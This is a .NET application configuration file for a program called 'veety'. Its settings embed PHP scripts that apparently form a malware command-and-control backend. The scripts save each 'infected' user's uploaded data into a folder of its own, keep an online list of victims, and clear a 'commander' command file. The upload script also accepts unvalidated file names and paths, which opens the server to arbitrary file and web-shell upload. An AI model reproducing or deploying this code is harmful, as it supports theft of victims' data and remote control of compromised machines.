<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <configSections>
        <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >
            <section name="veety.My.MySettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />
        </sectionGroup>
    </configSections>
    <startup>
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
    </startup>
    <userSettings>
        <veety.My.MySettings>
            <setting name="RM" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="rLogin" serializeAs="String">
                <value />
            </setting>
            <setting name="rPassword" serializeAs="String">
                <value />
            </setting>
            <setting name="UplUsrDta" serializeAs="String">
                <value>&lt;?php
$name = $_GET['USERNAME'];
move_uploaded_file($_FILES["file"]["tmp_name"], $name . $_FILES["file"]["name"]);
?&gt;</value>
            </setting>
            <setting name="AddInfected" serializeAs="String">
                <value>&lt;?php
$name = $_GET['USERNAME'];

if (file_exists($name) &amp;&amp; is_dir($name)) {
    echo "failed";
} else {
    if (mkdir($name)) {
        echo "success";
    } else {
        echo "Failed to create folder.";
    }
}
?&gt;
</value>
            </setting>
            <setting name="ClearCommader" serializeAs="String">
                <value>&lt;?php
$file = 'commander'; // nazwa pliku do wyczyszczenia

// Otwieramy plik do zapisu, co spowoduje jego wyczyszczenie
if (file_put_contents($file, '') !== false) {
    echo "success.";
} else {
    echo "error.";
}
?&gt;</value>
            </setting>
            <setting name="AddOnline" serializeAs="String">
                <value>&lt;?php
// Sprawdź, czy parametr 'tekst' jest ustawiony w URL
if (isset($_GET['UserID'])) {
    // Pobierz tekst z URL
    $UserID= $_GET['UserID'];

    // Otwórz plik 'online.yml' w trybie dopisywania
    $plik = fopen('online.html', 'a');

    // Sprawdź, czy plik został poprawnie otwarty
    if ($plik) {
        // Dodaj nową linię na końcu pliku
        fwrite($plik, $UserID . PHP_EOL);
        
        // Zamknij plik
        fclose($plik);

        echo "success";
    } else {
        echo "fail";
    }
} else {
    echo "Nie podano tekstu.";
}
?&gt;
</value>
            </setting>
            <setting name="RemOnline" serializeAs="String">
                <value>&lt;?php
// Sprawdź, czy parametr 'UserID' jest ustawiony w URL
if (isset($_GET['UserID'])) {
    // Pobierz wartość parametru 'UserID' z URL
    $UserID = $_GET['UserID'];

    // Wczytaj zawartość pliku 'online.html' do tablicy
    $linie = file('online.html', FILE_IGNORE_NEW_LINES);

    // Sprawdź, czy plik został poprawnie wczytany
    if ($linie !== false) {
        // Znajdź linię z tekstem równym $UserID i usuń ją
        $nowe_linie = array_filter($linie, function($linia) use ($UserID) {
            return trim($linia) !== $UserID;
        });

        // Sprawdź, czy nastąpiła zmiana (czy tekst został znaleziony i usunięty)
        if (count($nowe_linie) !== count($linie)) {
            // Zapisz zaktualizowaną zawartość z powrotem do pliku
            $plik = fopen('online.html', 'w');

            // Sprawdź, czy plik został poprawnie otwarty
            if ($plik) {
                foreach ($nowe_linie as $nowa_linia) {
                    fwrite($plik, $nowa_linia . PHP_EOL);
                }

                // Zamknij plik
                fclose($plik);

                echo "success";
            } else {
                echo "fail";
            }
        } else {
            echo "Nie znaleziono podanego tekstu.";
        }
    } else {
        echo "Nie udało się otworzyć pliku.";
    }
} else {
    echo "Nie podano tekstu.";
}
?&gt;</value>
            </setting>
            <setting name="ONLINEINDEX" serializeAs="String">
                <value />
            </setting>
        </veety.My.MySettings>
    </userSettings>
</configuration>